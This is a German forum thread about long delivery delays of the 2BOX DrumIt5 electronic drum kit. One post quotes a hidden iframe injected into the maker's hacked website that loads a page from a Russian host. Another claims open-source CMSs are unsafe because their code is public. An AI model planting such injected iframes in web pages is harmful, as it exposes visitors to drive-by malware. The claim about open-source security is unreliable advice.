Rund ums 2BOX DrumIt5 von den ersten Erfahrungen bis heute

  • Das klingt auch alles nach sehr dünner Personaldicke bzw. extrem improvisierte Produktionsbedingungen...
    Da scheint also null Kapital da zu sein, was mir gewisse Bauchschmerzen bereitet. Unter solchen Strukturen ist oft schneller Schluss, als einem lieb ist.
    Wie wollen die denn bei erfolgreicher Markteinführung eintrudelnde Bestellungen unter vernünftigen Wartezeiten abarbeiten?
    Wenn jetzt plötzlich 500 Sets geordert würden, dürfen die Kunden 6 Monate drauf warten... :wacko:
    Aber trotzdem bin ichmal auf die ersten Endverbraucherreaktionen gespannt... ^^

  • Na kommt, jetzt malt mal den Teufel net an die Wand! Gerade die guten "Businesses" haben oft klein angefangen, nur "damals" konnte sich nich niemand im Internet drüber aufregen ;) Springt nur schlecht an, läuft perfekt (wer möchte tauschen?) :thumbup:


    Ich drück die Daumen, vielleicht komme ich ja dann bald endlich auch zum "Einzel-Gehirn" :D

    "Geduld und Zeit bringen mehr als Gewalt und Streit"

    Jesses' Drummergalerie wird bei Gelegenheit mal aktualisiert und neu verlinkt ;)

  • Hallo,
    mein erstes Posting hier. Hab mich extra angemeldet nachdem ich gesehen hab dass hier noch einige andere auf das Teil warten.
    Ich hab im August 2008 meine Bestellung aufgegeben und die Entschuldigungsemails des Herstellers füllen ein mittlerweile ein Buch.
    Am besten sind die emails die mit jeweils exakt gleichem Text die Auslieferung in den nächsten 5 Wochen angekündigt haben. Spätestens nach der dritten kopie hab ich aufgehört daran zu glauben.
    Lediglich die Tatsache dass der deutsche Vertrieb nunmehr seit knapp einer Woche das Produkt sogar auf seiner Webseiote listet gibt mir noch Anlass zur Hoffnung dass das Ding doch demnächst geliefert wird.
    Aber bevor es nicht hier steht glaub ich eh nix mehr. Hoffentlich ist das Produkt besser als das Marketing.


    in diesem sinne
    beste grüsse
    :D

  • Na das ist doch schön! Kann man sich die Wartezeit gemeinsam verkürzen :D Bin ect gespannt, wann die Dinger endlich zur Auslieferung kommen (und wann es das Brain Standalone gibt).

    "Geduld und Zeit bringen mehr als Gewalt und Streit"

    Jesses' Drummergalerie wird bei Gelegenheit mal aktualisiert und neu verlinkt ;)

  • vorsicht beim aufruf der 2box-homepage!
    scheinbar wurde die page gehackt durch unsere russischen freunde ;)


    im quelltext findet sich:


    Code
    <iframe src="http://u3y.ru:8080/index.php" width=155 height=193 style="visibility: hidden"></iframe>
  • sag mal, was soll denn das! das ist ja echt unfair. wie schaffen die es nur an den ftp-zugang zu kommen?



    ich rate meinen kunden stets abstand von joomla, typo3 und anderen open-source cms zu nehmen. denn der quelltext + php von webseiten, die damit gemacht werden ist offen und somit ganz einfach anzugreifen. es gibt zudem weitaus bessere alternativen, die das selbe leisten aber eben nicht offengelegt sind. kennt ihr auch gästebücher oder foren, die ständig gespamt werden. das liegt am offenen php-code, hier kann sich ein hacker seine einstiegsmöglichkeit selbst raussuchen oder nach einfachen lücken suchen.


    wurde 2box schon informiert? ist ja enorm, wenn deshalb kunden verärgert werden und wegbleiben. chichi

  • Hallo,


    weiß jemand, ob die alten ddrum-Sounds vom Brain akzeptiert werden?
    Wäre ja nicht schlecht, gell?


    Gruß


    Tanzmusikanten

  • Ich lese das hier und kann es nicht glauben...


    Die Vorgehensweise von Entwicklern, Herstellern und Händlern kann ich ja noch nachvollziehen - aber als Kunde warte ich doch erst mal ab.


    Wer bestellt sich denn ernsthaft ein Produkt, das noch nicht serienmäßig auf dem Markt ist?
    "Erster" sein wollen kann es doch nicht sein... oder etwa doch?


    .

    Schöne Grüße - Rainer K. aus B. an der W.

  • Coole Vorstellung. Kein Mensch kauft irgend etwas bei Release und wartet drauf bis ein anderer es zu erst kauft und testet. Das machen nun alle so.
    Wunderbar! So muss das sein.....
    Und Serienfertigung ist also ein Indiz für Qualität. Gut zu wissen

    "Ein schwules Bier, bitte!"
    As He Creates So He Destroys!!!

  • die Warterei geht weiter: Nach heutigem Telefonat mit dem Vertrieb steht fest, dass 18 Sets beim Vertrieb stehen und wahrscheinlich in der nächsten Woche 150 Sets ankommen.


    Nein! Denn die Steuerteile fehlen! E-Drums ohne Steuerteil an die Endkunden auszuliefern macht natürlich wenig Sinn. Die Steuerteile fehlen, weil 2Box diese noch immer mit Sounds bzw. Sets "füttert". Stellt sich die Frage, was hat 2Box in den letzten Jahren gemacht? Und bleibt die Frage, weshalb 2Box ein unfertiges Produkt zur Bestellung freigibt.


    Das alles ist ein großer Witz.Den hätte ich schon lange gesagt ihr könnt eure Sachen behalten.man muss sich mal überlegen wie lange das Teil schon angepriesen wird.Sehen konnte man es bisher aber nur auf der MuMe.Diese ganze vorgangsweise hält mich schon absolut davon ab so ein teil jemals zu bestellen.Ne Ne da bleib ich lieber den guten alten Roland Sets treu,die für mich immer noch das Beste auf dem E Drum Sektor sind.

Jetzt mitmachen!

Du hast noch kein Benutzerkonto auf unserer Seite? Registriere dich kostenlos und nimm an unserer Community teil!